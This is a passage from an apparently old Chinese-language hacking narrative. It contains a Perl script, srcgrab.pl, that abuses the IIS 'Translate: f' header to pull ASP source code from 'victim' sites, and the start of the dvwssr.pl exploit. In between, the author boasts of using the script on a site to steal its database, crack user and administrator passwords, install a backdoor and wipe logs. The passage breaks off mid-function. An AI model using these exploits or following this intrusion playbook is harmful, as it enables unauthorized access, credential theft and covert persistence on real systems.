if (not $ARGV[0]) {;;;
print qq~
Geee it磗;;; running !! kewl :)))
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~; exit;};;;
$victimurl=$ARGV[0];
# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;
# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url ;)
$req->content_type('application/x-www-FORM-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header :))
$req->content('match=www&errors=0');
# Pass request to the user agent and get a response back
my $res = $ua->request($req);
# Check the outcome of the response
if ($res->is_success) {;;;
print $res->content;
};;; else {;;;
print $res->error_as_HTML;
};;;
---------代码结束-------------
打上perl -x srcgrab.pl http://chat.com/login.asp > chat.txt
(导出代码为chat.txt),看来我还有点运气,白痴网管没打补丁,嘿嘿。
看看代码,把数据库搞下来了,搞到这些用户名和密码后,挂好这些用户名和密码满满破啦,我们先喝杯茶歇会。
几分钟后,嘿嘿,Administrator的密码居然被搞出来了啊!@dm1n,网管对密码还挺精明的,不过补丁就不是了啊。登陆后搞好后门和清LOG先。
OK了,现在来搞定那个ABC吧,上面的老步骤啦,
。。。。。。。。。。。。。
靠,居然ERROR了,这个网管没那么傻啊,哎看来得再找办法了。
用用最近刚搞到的代码吧,这个漏洞是利用微软留下的后门搞到文件的原代码。Netscape engineers are weenies!就是那个后门的密码。
------------代码开始----------------
#!/usr/bin/perl
# dvwssr.pl by rain forest puppy (only tested on Linux, as usual)
use Socket;
$ip=$ARGV[0];
$file=$ARGV[1];
print "Encoding to: ".encodefilename($file)."\n";
$url="GET /_vti_bin/_vti_aut/dvwssr.dll?".encodefilename($file)." HTTP/1.0\n\n";
print sendraw($url);
sub encodefilename {;;
my $from=shift;
my $slide="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";